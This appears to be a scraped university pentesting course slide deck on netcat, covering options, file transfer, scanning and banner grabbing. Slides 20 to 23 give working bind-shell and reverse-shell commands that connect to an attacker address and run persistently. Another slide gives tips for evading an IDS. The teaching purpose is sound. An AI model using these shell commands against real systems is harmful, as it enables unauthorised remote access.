Published by Rodrigo Trapnell. Modified over 10 years ago.
Slide 1: COMP265 - Pentesting netcat
Slide 2: What?
- Like cat, but for networks
- Standard input is sent over the network to a remote ip:port
- Packets from the network are sent to standard output
- Low level
- Versatile: "the network Swiss army knife"
Slide 3: Basic Operation
- Client mode: connects to a specific remote port
- Listen mode: waits for a connection on a port
- Both modes: standard input is sent to the net; data from the net is sent to standard output
- Messages from netcat itself are sent to standard error
- Packets can have source routing attached
Slide 4: Netcat Command
- May be the two-letter command "nc", like cp and other traditional two-letter Unix commands:
    nc options hostname ports
- May be the word "netcat"
- Another variant, "ncat", from the nmap project, supports a few more options
- Which you get depends on the platform; Kali has both
- Sometimes you have to compile from source to get all options (SUSE)
Slide 5: Command Options
    -l          listen mode, for inbound connects
    -L          "listen harder": persistent listener (Windows only)
    -n          numeric-only IP addresses, no DNS
    -p port     local port number
    -r          randomize local and remote ports
    -s addr     local source address
    -u          UDP mode
    --sctp      SCTP mode
    -v          verbose (use twice to be more verbose)
Slide 6: Command Options (continued)
    -i secs     delay interval for lines sent, ports scanned
    -t          answer TELNET negotiation
    -w secs     timeout for connects and final net reads
    -z          zero-I/O mode (used for scanning)
These three options are not available in some packages:
    -o file or -x file     (hex) dump of traffic
    -e prog or -c command  program to exec after connect
    -g gateway             source-routing hop point[s], up to 8
Slide 7: What for?
- Send files
- Telnet
- Backdoor
- Port scan
- Banner grabbing
- Reverse shell
- Relay (proxy)
- Port forward
- Replay
Slide 8: Arguments
- Host can be a name or an IP
- -n = no DNS lookups, IP only; otherwise a full DNS forward and reverse lookup is done
- -v or -vv = verbose messages, always sent to standard error
- -w limits the wait time; -w 3 is recommended
- -o filename produces a dump of all traffic, > or <
- -i slows down sending; used if the input comes from a file
Slide 9: Send Files
Sender (listens and serves the file):
    nc -l -p 80 < file.txt
    cat file.txt | nc -l -p 80
Receiver (connects and writes what arrives to a file):
    nc 192.168.1.1 80 > file.txt
Note the use of redirect and pipe. The receiver could have been a web browser. Redirects (<, >) and pipes (|) all enhance the power of netcat.
Slide 10: Another Example
Listener sends a compressed partition image, connecting side receives it:
    dd if=/dev/sda3 | gzip | nc -l 80
    nc 192.168.17.1 80 > sda3.img.gz
Or, the listener can be the receiver:
    nc -w 3 -l 80 > /home.cmb.tar.gz
    tar -cvf - /home/cmb | gzip | nc 192.168.17.1 80
Slide 11: nc vs telnet
    cmblap:~ # telnet 192.168.17.24 25
    Trying 192.168.17.24...
    Connected to 192.168.17.24.
    Escape character is '^]'.
    220 fivefortyfour.com ESMTP
    ^C
    ^]
    telnet> quit
    Connection closed.

    cmblap:~ # netcat 192.168.17.24 25
    220 fivefortyfour.com ESMTP
    helo
    250 fivefortyfour.com
    quit
    221 fivefortyfour.com
    cmblap:
Slide 12: As telnet client
- Netcat quits when you want it to
- Doesn't pay attention to standard input EOF
- Doesn't require an escape character
- Less cruft
- Transfers arbitrary binary data
- Better utility for probing services
- Can use UDP
- -t responds automatically to telnet option negotiations
Slide 13: Probing?
Netcat can do port scans. This took around 1 second:
    cmblap:~ # netcat -v -w 2 -z 192.168.17.24 20-1000
    jabber.fivefortyfour.com [192.168.17.24] 631 (ipp) open
    jabber.fivefortyfour.com [192.168.17.24] 445 (microsoft-ds) open
    jabber.fivefortyfour.com [192.168.17.24] 139 (netbios-ssn) open
    jabber.fivefortyfour.com [192.168.17.24] 111 (sunrpc) open
    jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open
    jabber.fivefortyfour.com [192.168.17.24] 80 (http) open
    jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open
    jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open
    jabber.fivefortyfour.com [192.168.17.24] 24 (?) open
    jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open
    cmblap:~ #
Slide 14: UDP scans too
These are much slower:
    cmblap:~ # netcat -v -w 2 -z -u 192.168.17.24 20-100
    jabber.fivefortyfour.com [192.168.17.24] 67 (bootps) open
    jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open
Slide 15: Scanning Options
- -i: delay interval, to slow down scans
- -r: randomise ports, including the source port
- -z: send no data (TCP) or minimal data (UDP)
- -i and -r help to avoid an IDS
- -vv reports closed ports as well
Slide 16: Fancier Scan
    echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000
Slide 17: Banner Grabbing
    cmblap:~ # netcat -v 192.168.17.24 110
    jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open
    +OK Hello there.
    quit
    +OK Better luck next time.

    cmblap:~ # netcat -v 192.168.17.24 25
    jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open
    220 fivefortyfour.com ESMTP
    quit
    221 fivefortyfour.com

    cmblap:~ # netcat -v 192.168.17.24 22
    jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open
    SSH-1.99-OpenSSH_4.1
    quit
    Protocol mismatch.
Slide 18: Chat Session
Just for fun.
Machine 192.168.17.6:
    nc -l -p 1234
Machine 2:
    nc 192.168.17.6 1234
Each machine's keyboard input appears on the other machine's screen.
Note: use the -v option to diagnose any problems that appear.
Slide 19: Web Browser
    printf 'GET / HTTP/1.0\r\nHost: somewhere.com\r\n\r\n' | nc address 80 > page.html
The request must be a complete HTTP request line followed by a blank line; a bare "GET somewhere.com" is not valid HTTP and most servers will not answer it.
Slide 20: Backdoor
By routing netcat's standard output to a command interpreter, we create a remote shell:
    cmblap:/usr/local/src/netcat-0.7.1/src # ./netcat -l -n -v -s 192.168.18.8 -p 1234 -e /bin/sh
    Connection from 192.168.18.1:4289
    cmblap:/usr/local/src/netcat-0.7.1/src #
I had to download and build to enable the -e switch.
Cannot pass parameters to the program.
Slide 21: On the other end
    pdlnx2:~ # netcat -v 192.168.18.8 1234
    DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap
    cmblap.fivefortyfour.com [192.168.18.8] 1234 (search-agent) open
    df
    Filesystem     1K-blocks     Used Available Use% Mounted on
    /dev/sda6       20641788  7448780  12144368  39% /
    udev             1540268      192   1540076   1% /dev
    /dev/sda2       39942856  8711724  31231132  22% /windows/C
    /dev/sda8       20650996 17395552   2206404  89% /home/cmb
    exit
    pdlnx2:~ #
Slide 22: More backdoors
On Windows:
    nc -L -p 1234 -d -e cmd.exe
- -L means listen hard: wait for connections (not needed on Unix)
- -d means detach from the process (also not needed on Linux)
Slide 23: "Shoveling" a Shell
Aka reverse shell.
- The compromised machine cannot accept connections: it has to initiate connections because of a firewall/NAT
- The attacker listens from outside the firewall:
    netcat -v -l -p 1234
- A script on the compromised machine starts a shell, then connects to the attacker:
    netcat ip.addr 1234 -e /bin/sh
- The script has to run forever, or at timed intervals, or in response to some event
Slide 24: Port Forwarding
Forwarding localhost port 8080 to remote host port 80:
    ncat -l localhost 8080 --sh-exec "ncat remote.host 80"
Slide 25: References
- ncat: http://nmap.org/ncat/
    The user's guide is a good reference: http://nmap.org/ncat/guide/index.html
- netcat: http://netcat.sourceforge.net/
- Don't forget the man pages
Slide 26: Lab
- The lab today will exercise many of these functions
- Due the day of the lab next week, Feb 18 (no new lab next week)